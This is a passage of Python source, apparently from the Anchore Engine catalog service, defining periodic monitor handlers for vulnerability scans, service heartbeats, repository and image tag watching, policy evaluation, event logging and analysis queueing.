                userId = account['name']
                logger.debug("Inspecting account {} for resource cleanup tasks".format(userId))
                try:
                    return_object, httpcode = do_user_resources_delete(userId)
                    logger.debug("Resources for deleted account cleaned-up: {} - {}".format(return_object, httpcode))
                    if return_object.get('all_total', None) == 0 and return_object.get('all_deleted', None) == 0:
                        # Nothing left for this account: remove the record itself.
                        logger.debug("Resources for pending deleted user {} cleared - deleting account".format(userId))
                        with db.session_scope() as session:
                            mgr = manager_factory.for_session(session)
                            mgr.delete_account(userId)
                    else:
                        logger.debug("resources for pending deleted user {} not entirely cleared this cycle".format(userId))
                except Exception as err:
                    raise Exception("failed to delete user {} resources - exception: {}".format(userId, err))
    except Exception as err:
        logger.warn("failure in handler - exception: " + str(err))
    logger.debug("FIRING DONE: " + str(watcher))
    try:
        kwargs['mythread']['last_return'] = handler_success
    except:
        pass
    # Always emit the runtime summary; status depends on metrics/success flags.
    if anchore_engine.subsys.metrics.is_enabled() and handler_success:
        status = "success"
    else:
        status = "fail"
    anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - start_time,
                                                  function=watcher, status=status)
    return (True)
def handle_vulnerability_scan(*args, **kwargs):
    """
    Monitor task: for every enabled account, find active 'vuln_update'
    subscriptions and run a vulnerability scan for each subscribed image
    digest whose analysis is complete.

    Skips the whole cycle when the policy_engine service is not yet ready.
    Always returns True; per-cycle success is recorded in
    kwargs['mythread']['last_return'] and in the monitor metrics summary.
    """
    global feed_sync_updated
    watcher = str(kwargs['mythread']['taskType'])
    handler_success = True
    timer = time.time()
    logger.debug("FIRING: " + str(watcher))
    try:
        all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine'])
        if not all_ready:
            logger.debug("FIRING DONE: feed syncer (skipping due to required services not being available)")
            try:
                kwargs['mythread']['last_return'] = False
            except:
                pass
            return (True)
        with db.session_scope() as dbsession:
            mgr = manager_factory.for_session(dbsession)
            accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
        for account in accounts:
            userId = account['name']
            # vulnerability scans
            doperform = False
            # vuln_subs collects unique (image filter, subscription value) pairs.
            vuln_subs = []
            for subscription_type in ['vuln_update']:
                dbfilter = {'subscription_type': subscription_type}
                with db.session_scope() as dbsession:
                    subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
                for subscription_record in subscription_records:
                    if subscription_record['active']:
                        image_info = anchore_engine.common.images.get_image_info(userId, "docker", subscription_record[
                            'subscription_key'], registry_lookup=False, registry_creds=(None, None))
                        dbfilter = {'registry': image_info['registry'], 'repo': image_info['repo'],
                                    'tag': image_info['tag']}
                        if (dbfilter, subscription_record['subscription_value']) not in vuln_subs:
                            vuln_subs.append((dbfilter, subscription_record['subscription_value']))
            for (dbfilter, value) in vuln_subs:
                with db.session_scope() as dbsession:
                    image_records = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter=dbfilter,
                                                                       onlylatest=False, session=dbsession)
                # The subscription value, when present, carries the set of
                # digests to scan (JSON: {'digests': [...]}).
                if value:
                    try:
                        subscription_value = json.loads(value)
                        digests = set(subscription_value['digests'])
                    except Exception as err:
                        digests = set()
                else:
                    digests = set()
                # always add latest version of the image
                if len(image_records) > 0:
                    digests.add(image_records[0]['imageDigest'])
                    current_imageDigest = image_records[0]['imageDigest']
                # NOTE(review): `current_imageDigest`, `imageDigest` and
                # `fulltag` are only bound inside the conditionals above/below;
                # if image_records is empty but doperform were ever True these
                # would raise NameError — appears unreachable, but confirm.
                for image_record in image_records:
                    if image_record['analysis_status'] == taskstate.complete_state('analyze'):
                        imageDigest = image_record['imageDigest']
                        if imageDigest not in digests:
                            continue
                        fulltag = dbfilter['registry'] + "/" + dbfilter['repo'] + ":" + dbfilter['tag']
                        doperform = True
                        if doperform:
                            logger.debug("calling vuln scan perform: " + str(fulltag) + " : " + str(imageDigest))
                            with db.session_scope() as dbsession:
                                try:
                                    rc = catalog_impl.perform_vulnerability_scan(userId, imageDigest, dbsession, scantag=fulltag, force_refresh=False, is_current=(imageDigest==current_imageDigest))
                                except Exception as err:
                                    logger.warn("vulnerability scan failed - exception: " + str(err))
    except Exception as err:
        logger.warn("failure in feed sync handler - exception: " + str(err))
    logger.debug("FIRING DONE: " + str(watcher))
    try:
        kwargs['mythread']['last_return'] = handler_success
    except:
        pass
    if anchore_engine.subsys.metrics.is_enabled() and handler_success:
        anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
                                                      function=watcher, status="success")
    else:
        anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
                                                      function=watcher, status="fail")
    return (True)
def handle_service_watcher(*args, **kwargs):
    """
    Long-running monitor loop: each cycle, inspect every registered service
    record and update its heartbeat/status, emitting events on state
    transitions (down, orphaned, removed).

    Timers (seconds since last heartbeat):
      > 300   -> mark service down
      > 3600  -> mark service orphaned
      > 86400 -> remove the service record entirely
    Sleeps kwargs['mythread']['cycle_timer'] between cycles; the trailing
    return is unreachable (the while loop never breaks).
    """
    # global latest_service_records
    cycle_timer = kwargs['mythread']['cycle_timer']
    max_service_heartbeat_timer = 300
    max_service_orphaned_timer = 3600
    max_service_cleanup_timer = 86400
    while (True):
        logger.debug("FIRING: service watcher")
        localconfig = anchore_engine.configuration.localconfig.get_config()
        verify = localconfig['internal_ssl_verify']
        with db.session_scope() as dbsession:
            mgr = manager_factory.for_session(dbsession)
            event_account = anchore_engine.configuration.localconfig.ADMIN_ACCOUNT_NAME
            anchore_services = db_services.get_all(session=dbsession)
            # update the global latest service record dict in services.common
            # latest_service_records.update({"service_records": copy.deepcopy(anchore_services)})
            # fields to update each tick:
            #
            # heartbeat (current time)
            # status (true/false)
            # status_message (state of service)
            # short_description(api return)
            #
            for service in anchore_services:
                event = None
                service_update_record = {}
                # This catalog instance reports its own status directly.
                if service['servicename'] == 'catalog' and service['hostid'] == localconfig['host_id']:
                    status = anchore_engine.subsys.servicestatus.get_status(service)
                    service_update_record.update({'heartbeat': int(time.time()), 'status': True,
                                                  'status_message': taskstate.complete_state('service_status'),
                                                  'short_description': json.dumps(status)})
                else:
                    try:
                        try:
                            status = json.loads(service['short_description'])
                        except:
                            status = {'up': False, 'available': False}
                        # set to down until the response can be parsed
                        service_update_record['status'] = False
                        service_update_record['status_message'] = taskstate.fault_state('service_status')
                        service_update_record['short_description'] = "could not get service status description"
                        try:
                            # NOTE: this is where any service-specific decisions based on the 'status' record could happen - now all services are the same
                            if status['up'] and status['available']:
                                if time.time() - service['heartbeat'] > max_service_heartbeat_timer:
                                    logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - disabling service".format(max_service_heartbeat_timer, service['hostid'], service['servicename']))
                                    service_update_record[
                                        'short_description'] = "no heartbeat from service in ({}) seconds".format(
                                        max_service_heartbeat_timer)
                                    # Trigger an event to log the down service
                                    event = events.ServiceDownEvent(user_id=event_account, name=service['servicename'],
                                                                    host=service['hostid'],
                                                                    url=service['base_url'],
                                                                    cause='no heartbeat from service in ({}) seconds'.format(
                                                                        max_service_heartbeat_timer))
                                else:
                                    service_update_record['status'] = True
                                    service_update_record['status_message'] = taskstate.complete_state('service_status')
                                    try:
                                        service_update_record['short_description'] = json.dumps(status)
                                    except:
                                        service_update_record['short_description'] = str(status)
                            else:
                                # handle the down state transitions
                                if time.time() - service['heartbeat'] > max_service_cleanup_timer:
                                    # remove the service entirely
                                    logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - removing service".format(max_service_cleanup_timer, service['hostid'], service['servicename']))
                                    try:
                                        # remove the service record from DB
                                        removed_hostid = service['hostid']
                                        removed_servicename = service['servicename']
                                        removed_base_url = service['base_url']
                                        db_services.delete(removed_hostid, removed_servicename, session=dbsession)
                                        # No record left to update after deletion.
                                        service_update_record = None
                                        # Trigger an event to log the orphaned service, only on transition
                                        event = events.ServiceRemovedEvent(user_id=event_account, name=removed_servicename,
                                                                           host=removed_hostid,
                                                                           url=removed_base_url,
                                                                           cause='no heartbeat from service in ({}) seconds'.format(
                                                                               max_service_cleanup_timer))
                                    except Exception as err:
                                        logger.warn("attempt to remove service {}/{} failed - exception: {}".format(service.get('hostid'), service.get('servicename'), err))
                                elif time.time() - service['heartbeat'] > max_service_orphaned_timer:
                                    # transition down service to orphaned
                                    logger.warn("no service heartbeat within allowed time period ({}) for service ({}/{}) - orphaning service".format(max_service_orphaned_timer, service['hostid'], service['servicename']))
                                    service_update_record['status'] = False
                                    service_update_record['status_message'] = taskstate.orphaned_state('service_status')
                                    service_update_record[
                                        'short_description'] = "no heartbeat from service in ({}) seconds".format(
                                        max_service_orphaned_timer)
                                    if service['status_message'] != taskstate.orphaned_state('service_status'):
                                        # Trigger an event to log the orphaned service, only on transition
                                        event = events.ServiceOrphanedEvent(user_id=event_account, name=service['servicename'],
                                                                            host=service['hostid'],
                                                                            url=service['base_url'],
                                                                            cause='no heartbeat from service in ({}) seconds'.format(
                                                                                max_service_orphaned_timer))
                        except Exception as err:
                            logger.warn(
                                "could not get/parse service status record for service: - exception: " + str(err))
                    except Exception as err:
                        logger.warn(
                            "could not get service status: " + str(service) + " : exception: " + str(err) + " : " + str(
                                err.__dict__))
                        if service_update_record:
                            service_update_record['status'] = False
                            service_update_record['status_message'] = taskstate.fault_state('service_status')
                            service_update_record['short_description'] = "could not get service status"
                    finally:
                        # Persist whatever state was decided above and emit any event.
                        if event:
                            _add_event(event)
                        if service_update_record:
                            service.update(service_update_record)
                            try:
                                db_services.update_record(service, session=dbsession)
                            except Exception as err:
                                logger.warn("could not update DB: " + str(err))
        logger.debug("FIRING DONE: service watcher")
        try:
            kwargs['mythread']['last_return'] = True
        except:
            pass
        time.sleep(cycle_timer)
    return (True)
def handle_repo_watcher(*args, **kwargs):
    """
    Monitor task: for every enabled account, process active 'repo_update'
    subscriptions — list the repository's tags in the registry, add any tags
    not yet tracked (creating catalog image records and per-type
    subscriptions), and write the updated tag list back to the subscription.

    Failures for a single subscription or tag are logged and skipped; events
    are emitted for registry list failures and manifest parse failures.
    """
    global system_user_auth
    watcher = str(kwargs['mythread']['taskType'])
    handler_success = True
    timer = time.time()
    logger.debug("FIRING: " + str(watcher))
    with db.session_scope() as dbsession:
        mgr = manager_factory.for_session(dbsession)
        accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
    for account in accounts:
        userId = account['name']
        dbfilter = {}
        with db.session_scope() as dbsession:
            dbfilter['subscription_type'] = 'repo_update'
            subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
            registry_creds = db_registries.get_byuserId(userId, session=dbsession)
            try:
                catalog_impl.refresh_registry_creds(registry_creds, dbsession)
            except Exception as err:
                logger.warn("failed to refresh registry credentials - exception: " + str(err))
        for subscription_record in subscription_records:
            if not subscription_record['active']:
                continue
            event = None
            try:
                regrepo = subscription_record['subscription_key']
                # subscription_value is a JSON blob with 'autosubscribe',
                # 'lookuptag' and the previously-seen 'repotags'.
                if subscription_record['subscription_value']:
                    subscription_value = json.loads(subscription_record['subscription_value'])
                    if 'autosubscribe' not in subscription_value:
                        subscription_value['autosubscribe'] = False
                    if 'lookuptag' not in subscription_value:
                        subscription_value['lookuptag'] = 'latest'
                else:
                    subscription_value = {'autosubscribe': False, 'lookuptag': 'latest'}
                stored_repotags = subscription_value.get('repotags', [])
                fulltag = regrepo + ":" + subscription_value.get('lookuptag', 'latest')
                image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
                                                                         registry_lookup=False,
                                                                         registry_creds=(None, None))
                # List tags
                try:
                    curr_repotags = docker_registry.get_repo_tags(userId, image_info, registry_creds=registry_creds)
                except AnchoreException as e:
                    event = events.ListTagsFail(user_id=userId, registry=image_info.get('registry', None),
                                                repository=image_info.get('repo', None), error=e.to_dict())
                    raise e
                autosubscribes = ['analysis_update']
                if subscription_value['autosubscribe']:
                    autosubscribes.append("tag_update")
                # Only tags not already tracked need processing.
                repotags = set(curr_repotags).difference(set(stored_repotags))
                if repotags:
                    logger.debug("new tags to watch in repo (" + str(regrepo) + "): " + str(repotags))
                    added_repotags = stored_repotags
                    for repotag in repotags:
                        try:
                            fulltag = image_info['registry'] + "/" + image_info['repo'] + ":" + repotag
                            logger.debug("found new tag in repo: " + str(fulltag))
                            new_image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
                                                                                        registry_lookup=True,
                                                                                        registry_creds=registry_creds)
                            manifest = None
                            try:
                                if 'manifest' in new_image_info:
                                    try:
                                        manifest = json.dumps(new_image_info['manifest'])
                                    except Exception as err:
                                        raise TagManifestParseError(cause=err, tag=fulltag,
                                                                    manifest=new_image_info['manifest'],
                                                                    msg='Failed to serialize manifest into JSON formatted string')
                                else:
                                    raise TagManifestNotFoundError(tag=fulltag, msg='No manifest from get_image_info')
                            except AnchoreException as e:
                                event = events.TagManifestParseFail(user_id=userId, tag=fulltag, error=e.to_dict())
                                raise
                            with db.session_scope() as dbsession:
                                logger.debug("adding/updating image from repo scan " + str(new_image_info['fulltag']))
                                # add the image
                                image_records = catalog_impl.add_or_update_image(dbsession, userId,
                                                                                 new_image_info['imageId'],
                                                                                 tags=[new_image_info['fulltag']],
                                                                                 digests=[new_image_info['fulldigest']],
                                                                                 parentdigest=new_image_info.get('parentdigest', None),
                                                                                 manifest=manifest)
                                # add the subscription records with the configured default activations
                                for stype in anchore_engine.common.subscription_types:
                                    activate = False
                                    if stype == 'repo_update':
                                        continue
                                    elif stype in autosubscribes:
                                        activate = True
                                    db_subscriptions.add(userId, new_image_info['fulltag'], stype, {'active': activate},
                                                         session=dbsession)
                            added_repotags.append(repotag)
                        except Exception as err:
                            logger.warn(
                                "could not add discovered tag from repo (" + str(fulltag) + ") - exception: " + str(
                                    err))
                    # update the subscription record with the latest successfully added image tags
                    with db.session_scope() as dbsession:
                        subscription_value['repotags'] = added_repotags
                        subscription_value['tagcount'] = len(added_repotags)
                        db_subscriptions.update(userId, regrepo, 'repo_update',
                                                {'subscription_value': json.dumps(subscription_value)},
                                                session=dbsession)
                else:
                    logger.debug("no new images in watched repo (" + str(regrepo) + "): skipping")
            except Exception as err:
                logger.warn("failed to process repo_update subscription - exception: " + str(err))
            finally:
                if event:
                    _add_event(event)
    logger.debug("FIRING DONE: " + str(watcher))
    try:
        kwargs['mythread']['last_return'] = handler_success
    except:
        pass
    if anchore_engine.subsys.metrics.is_enabled() and handler_success:
        anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
                                                      function=watcher, status="success")
    else:
        anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
                                                      function=watcher, status="fail")
    return (True)
def handle_image_watcher(*args, **kwargs):
    """
    Periodic watcher: for every enabled (non-service) account, check each active
    'tag_update' subscription against its registry and, when the tag's latest
    digest is not yet in the catalog DB, add the image (carrying forward
    annotations from the previously-known digest) and queue a 'tag_update'
    notification.

    :param kwargs: expects kwargs['mythread'] with 'taskType' and 'last_return'
    :return: True (always; per-tag failures are logged, not raised)
    """
    global system_user_auth
    watcher = str(kwargs['mythread']['taskType'])
    handler_success = True
    timer = time.time()
    logger.debug("FIRING: " + str(watcher))
    obj_mgr = object_store.get_manager()
    # snapshot the set of enabled accounts up front, outside the per-account work
    with db.session_scope() as dbsession:
        mgr = manager_factory.for_session(dbsession)
        accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
    for account in accounts:
        userId = account['name']
        if account['type'] == AccountTypes.service: # userId == 'anchore-system':
            continue
        # load this account's tag_update subscriptions and registry credentials
        with db.session_scope() as dbsession:
            dbfilter = {}
            dbfilter['subscription_type'] = 'tag_update'
            subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
            registry_creds = db_registries.get_byuserId(userId, session=dbsession)
            try:
                catalog_impl.refresh_registry_creds(registry_creds, dbsession)
            except Exception as err:
                logger.warn("failed to refresh registry credentials - exception: " + str(err))
        # build the unique list of tags that have an active tag_update subscription
        alltags = []
        for subscription_record in subscription_records:
            if not subscription_record['active']:
                continue
            try:
                fulltag = subscription_record['subscription_key']
                if fulltag not in alltags:
                    alltags.append(fulltag)
            except Exception as err:
                logger.warn("problem creating taglist for image watcher - exception: " + str(err))
        # ping each registry; mark auth failures in the record state (best-effort)
        for registry_record in registry_creds:
            try:
                registry_status = docker_registry.ping_docker_registry(registry_record)
            except Exception as err:
                registry_record['record_state_key'] = 'auth_failure'
                registry_record['record_state_val'] = str(int(time.time()))
                logger.warn("registry ping failed - exception: " + str(err))
        logger.debug("checking tags for update: " + str(userId) + " : " + str(alltags))
        for fulltag in alltags:
            event = None
            try:
                logger.debug("checking image latest info from registry: " + fulltag)
                image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
                                                                         registry_lookup=True,
                                                                         registry_creds=registry_creds)
                logger.spew("checking image: got registry info: " + str(image_info))
                # serialize the registry manifest; a missing/unserializable manifest
                # raises and is reported via a TagManifestParseFail event
                manifest = None
                try:
                    if 'manifest' in image_info:
                        try:
                            manifest = json.dumps(image_info['manifest'])
                        except Exception as err:
                            raise TagManifestParseError(cause=err, tag=fulltag, manifest=image_info['manifest'],
                                                        msg='Failed to serialize manifest into JSON formatted string')
                    else:
                        raise TagManifestNotFoundError(tag=fulltag, msg='No manifest from get_image_info')
                except AnchoreException as e:
                    event = events.TagManifestParseFail(user_id=userId, tag=fulltag, error=e.to_dict())
                    raise
                try:
                    dbfilter = {
                        'registry': image_info['registry'],
                        'repo': image_info['repo'],
                        'tag': image_info['tag'],
                        'digest': image_info['digest']
                    }
                except Exception as err:
                    raise Exception("could not prepare db filter for complete lookup check - exception: " + str(err))
                # ensure the manifest document is stored; re-store when missing/invalid
                try:
                    stored_manifest = json.loads(obj_mgr.get_document(userId, 'manifest_data', image_info['digest']))
                    if not stored_manifest:
                        raise Exception("stored manifest is empty")
                except Exception as err:
                    logger.debug("found empty/invalid stored manifest, storing new: " + str(err))
                    rc = obj_mgr.put_document(userId, 'manifest_data', image_info['digest'], manifest)
                logger.debug("checking image: looking up image in db using dbfilter: " + str(dbfilter))
                with db.session_scope() as dbsession:
                    record = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter, session=dbsession)
                if record:
                    logger.debug("checking image: found match, no update, nothing to do: " + str(fulltag))
                else:
                    logger.info(
                        "checking image: found latest digest for tag is not in DB: should update and queue for analysis: tag=" + str(
                            fulltag) + " latest_digest=" + str(dbfilter['digest']))
                    # get the set of existing digests
                    try:
                        last_dbfilter = {}
                        last_dbfilter.update(dbfilter)
                        last_dbfilter.pop('digest', None)
                        last_digests = []
                        last_annotations = {}
                        is_latest = True
                        with db.session_scope() as dbsession:
                            last_image_records = db_catalog_image.get_byimagefilter(userId, 'docker', last_dbfilter,
                                                                                    session=dbsession)
                            if last_image_records:
                                for last_image_record in last_image_records:
                                    imageDigest = last_image_record['imageDigest']
                                    for image_detail in last_image_record['image_detail']:
                                        last_digests.append(image_detail['digest'])
                                        # only do this (bring forward annotations) for the first found digest (last digest associated with tag)
                                        if is_latest:
                                            if not last_annotations and last_image_record['annotations']:
                                                try:
                                                    if last_image_record.get('annotations', '{}'):
                                                        last_annotations.update(
                                                            json.loads(last_image_record.get('annotations', '{}')))
                                                except:
                                                    pass
                                            is_latest = False
                    except Exception as err:
                        logger.error(str(err))
                    # add and store the new image
                    with db.session_scope() as dbsession:
                        logger.debug("adding new image from tag watcher " + str(image_info))
                        image_records = catalog_impl.add_or_update_image(dbsession, userId, image_info['imageId'],
                                                                         tags=[image_info['fulltag']],
                                                                         digests=[image_info['fulldigest']],
                                                                         parentdigest=image_info.get('parentdigest', None),
                                                                         manifest=manifest,
                                                                         annotations=last_annotations)
                        if image_records:
                            image_record = image_records[0]
                        else:
                            image_record = {}
                    logger.info("checking image: added new image: " + str(image_record))
                    new_digests = [image_info['digest']]
                    # construct the notification and queue
                    try:
                        npayload = {
                            'last_eval': last_digests,
                            'curr_eval': new_digests,
                        }
                        if last_annotations:
                            npayload['annotations'] = last_annotations
                        rc = notifications.queue_notification(userId, fulltag, 'tag_update', npayload)
                        logger.debug("queued image tag update notification: " + fulltag)
                        # inobj = {
                        #     'userId': userId,
                        #     'subscription_key':fulltag,
                        #     'notificationId': str(uuid.uuid4()),
                        #     'last_eval':last_digests,
                        #     'curr_eval':new_digests,
                        # }
                        # if not simplequeue.is_inqueue(system_user_auth, 'tag_update', inobj):
                        #     qobj = simplequeue.enqueue(system_user_auth, 'tag_update', inobj)
                        #     logger.debug("queued image tag update notification: " + fulltag)
                    except Exception as err:
                        logger.error("failed to queue tag update notification - exception: " + str(err))
                        raise err
            except Exception as err:
                logger.error("failed to check/update image - exception: " + str(err))
            finally:
                # persist any failure event raised while processing this tag
                if event:
                    _add_event(event)
    logger.debug("FIRING DONE: " + str(watcher))
    try:
        kwargs['mythread']['last_return'] = handler_success
    except:
        pass
    # record runtime metrics for this watcher pass
    if anchore_engine.subsys.metrics.is_enabled() and handler_success:
        anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
                                                      function=watcher, status="success")
    else:
        anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
                                                      function=watcher, status="fail")
    return (True)
def _add_event(event, quiet=True):
    """
    Persist an event to the event log and queue an 'event_log' notification for it.

    :param event: event object providing to_dict(), user_id, and level attributes
    :param quiet: when True (default) errors are logged and swallowed; when False
                  they propagate to the caller
    """
    try:
        # serialize once and reuse for both the DB record and the notification payload
        event_dict = event.to_dict()
        with db.session_scope() as dbsession:
            db_events.add(event_dict, dbsession)
        logger.debug("queueing event creation notification")
        npayload = {'event': event_dict}
        notifications.queue_notification(event.user_id, subscription_key=event.level,
                                         subscription_type='event_log', payload=npayload)
    # was a bare `except:`; narrowed so SystemExit/KeyboardInterrupt are never
    # swallowed by the quiet path
    except Exception:
        if quiet:
            logger.exception('Ignoring error creating/notifying event: {}'.format(event))
        else:
            raise
def check_feedmeta_update(dbsession):
    """
    Report whether a feed-metadata sync has occurred, by returning the
    module-level feed_sync_updated flag.

    :param dbsession: unused; kept for signature compatibility with callers
    :return: current value of feed_sync_updated
    """
    return feed_sync_updated
def check_policybundle_update(userId, dbsession):
    """
    Determine whether the given user's active policy bundle has changed since
    the last cycle, tracking the last-seen timestamp in the module-level
    bundle_user_last_updated map.

    Returns True when the bundle changed, when the user has no active bundle,
    or when the check itself fails (so evaluation is queued "just in case");
    returns False only when the bundle is confirmed unchanged.

    :param userId: account name to check
    :param dbsession: active DB session for the policy bundle lookup
    :return: bool
    """
    try:
        active_policy_record = db_policybundle.get_active_policy(userId, session=dbsession)
        if not active_policy_record:
            logger.warn("user has no active policy - queueing just in case" + str(userId))
            return True
        last_bundle_update = active_policy_record['last_updated']
        # first sighting of this user seeds the map with the current timestamp,
        # which reads back as "unchanged" on this cycle
        previously_seen = bundle_user_last_updated.setdefault(userId, last_bundle_update)
        if last_bundle_update == previously_seen:
            logger.debug("no bundle update detected since last cycle")
            return False
        logger.debug("bundle update detected since last cycle")
        bundle_user_last_updated[userId] = last_bundle_update
        return True
    except Exception as err:
        logger.warn("failed to get/parse active policy bundle for user (" + str(userId) + ") - exception: " + str(err))
        bundle_user_last_updated[userId] = 0
        return True
def handle_policyeval(*args, **kwargs):
    """
    Periodic watcher: for every enabled account, gather active 'policy_eval'
    subscriptions and run a policy evaluation for each fully-analyzed image
    digest covered by those subscriptions.

    :param kwargs: expects kwargs['mythread'] with 'taskType' and 'last_return'
    :return: True (always; failures are logged, not raised)
    """
    global system_user_auth, bundle_user_is_updated, feed_sync_updated
    watcher = str(kwargs['mythread']['taskType'])
    handler_success = True
    timer = time.time()
    logger.debug("FIRING: " + str(watcher))
    try:
        # both the policy engine and the queue must be up before evaluating
        all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine', 'simplequeue'])
        if not all_ready:
            logger.debug("FIRING DONE: policy eval (skipping due to required services not being available)")
            try:
                kwargs['mythread']['last_return'] = False
            except:
                pass
            return (True)
        with db.session_scope() as dbsession:
            feed_updated = check_feedmeta_update(dbsession)
            mgr = manager_factory.for_session(dbsession)
            accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
        for account in accounts:
            userId = account['name']
            # policy evaluations
            doperform = False
            # collect unique (image filter, subscription value) pairs from active subscriptions
            policy_subs = []
            for subscription_type in ['policy_eval']:
                dbfilter = {'subscription_type': subscription_type}
                with db.session_scope() as dbsession:
                    subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
                for subscription_record in subscription_records:
                    if subscription_record['active']:
                        image_info = anchore_engine.common.images.get_image_info(userId, "docker", subscription_record[
                            'subscription_key'], registry_lookup=False, registry_creds=(None, None))
                        dbfilter = {'registry': image_info['registry'], 'repo': image_info['repo'],
                                    'tag': image_info['tag']}
                        if (dbfilter, subscription_record['subscription_value']) not in policy_subs:
                            policy_subs.append((dbfilter, subscription_record['subscription_value']))
            for (dbfilter, value) in policy_subs:
                with db.session_scope() as dbsession:
                    image_records = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter=dbfilter,
                                                                       onlylatest=False, session=dbsession)
                # subscription value may carry an explicit digest allow-list (JSON)
                if value:
                    try:
                        subscription_value = json.loads(value)
                        digests = set(subscription_value['digests'])
                    except Exception as err:
                        digests = set()
                else:
                    digests = set()
                # always add latest version of the image
                if len(image_records) > 0:
                    digests.add(image_records[0]['imageDigest'])
                for image_record in image_records:
                    # only evaluate images whose analysis has completed
                    if image_record['analysis_status'] == taskstate.complete_state('analyze'):
                        imageDigest = image_record['imageDigest']
                        if imageDigest not in digests:
                            continue
                        fulltag = dbfilter['registry'] + "/" + dbfilter['repo'] + ":" + dbfilter['tag']
                        # TODO - checks to avoid performing eval if nothing has changed
                        doperform = True
                        if doperform:
                            logger.debug("calling policy eval perform: " + str(fulltag) + " : " + str(imageDigest))
                            with db.session_scope() as dbsession:
                                try:
                                    rc = catalog_impl.perform_policy_evaluation(userId, imageDigest, dbsession,
                                                                                evaltag=fulltag)
                                except Exception as err:
                                    logger.warn("policy evaluation failed - exception: " + str(err))
    except Exception as err:
        logger.warn("failure in policy eval / vuln scan handler - exception: " + str(err))
    logger.debug("FIRING DONE: " + str(watcher))
    try:
        kwargs['mythread']['last_return'] = handler_success
    except:
        pass
    # record runtime metrics for this watcher pass
    if anchore_engine.subsys.metrics.is_enabled() and handler_success:
        anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
                                                      function=watcher, status="success")
    else:
        anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
                                                      function=watcher, status="fail")
    return (True)
def handle_analyzer_queue(*args, **kwargs):
    """
    Periodic watcher: in two passes per account, (1) reset images stuck in the
    'analyzing' working state longer than the configured timeout, and (2) queue
    every image in the base 'not_analyzed' state onto the 'images_to_analyze'
    simplequeue for the analyzers to pick up.

    :param kwargs: expects kwargs['mythread'] with 'taskType' and 'last_return'
    :return: True (always; failures are logged, not raised)
    """
    global system_user_auth
    watcher = str(kwargs['mythread']['taskType'])
    handler_success = True
    timer = time.time()
    logger.debug("FIRING: " + str(watcher))
    localconfig = anchore_engine.configuration.localconfig.get_config()
    obj_mgr = object_store.get_manager()
    # default stuck-analysis timeout is 10 hours if not configured
    try:
        max_working_time = int(localconfig['image_analyze_timeout_seconds'])
    except:
        max_working_time = 36000
    all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine', 'simplequeue'])
    if not all_ready:
        logger.debug("FIRING DONE: analyzer queuer (skipping due to required services not being available)")
        try:
            kwargs['mythread']['last_return'] = False
        except:
            pass
        return (True)
    with db.session_scope() as dbsession:
        mgr = manager_factory.for_session(dbsession)
        accounts = mgr.list_accounts(include_service=False)
    q_client = internal_client_for(SimpleQueueClient, userId=None)
    for account in accounts:
        userId = account['name']
        if account['type'] == AccountTypes.service: # userId == 'anchore-system':
            continue
        # do this in passes, for each analysis_status state
        with db.session_scope() as dbsession:
            dbfilter = {'analysis_status': taskstate.working_state('analyze')}
            workingstate_image_records = db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
        # first, evaluate images looking for those that have been in working state for too long and reset
        for image_record in workingstate_image_records:
            imageDigest = image_record['imageDigest']
            if image_record['image_status'] == taskstate.complete_state('image_status'):
                state_time = int(time.time()) - image_record['last_updated']
                logger.debug("image in working state for (" + str(state_time) + ")s - " + str(imageDigest))
                if state_time > max_working_time:
                    logger.warn("image has been in working state (" + str(
                        taskstate.working_state('analyze')) + ") for over (" + str(
                        max_working_time) + ") seconds - resetting and requeueing for analysis")
                    image_record['analysis_status'] = taskstate.reset_state('analyze')
                    with db.session_scope() as dbsession:
                        db_catalog_image.update_record(image_record, session=dbsession)
        # next, look for any image in base state (not_analyzed) for queuing
        with db.session_scope() as dbsession:
            dbfilter = {'analysis_status': taskstate.base_state('analyze')}
            # dbfilter = {}
            basestate_image_records = db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
        for basestate_image_record in basestate_image_records:
            imageDigest = basestate_image_record['imageDigest']
            image_record = basestate_image_record
            # dbfilter = {'imageDigest': imageDigest}
            # with db.session_scope() as dbsession:
            #     image_records = db.db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
            #     image_record = image_records[0]
            if image_record['image_status'] == taskstate.complete_state('image_status'):
                logger.debug("image check")
                if image_record['analysis_status'] == taskstate.base_state('analyze'):
                    logger.debug("image in base state - " + str(imageDigest))
                    # fetch the stored manifest to include in the work payload (best-effort)
                    try:
                        manifest = obj_mgr.get_document(userId, 'manifest_data', image_record['imageDigest'])
                    except Exception as err:
                        logger.debug("failed to get manifest - {}".format(str(err)))
                        manifest = {}
                    qobj = {}
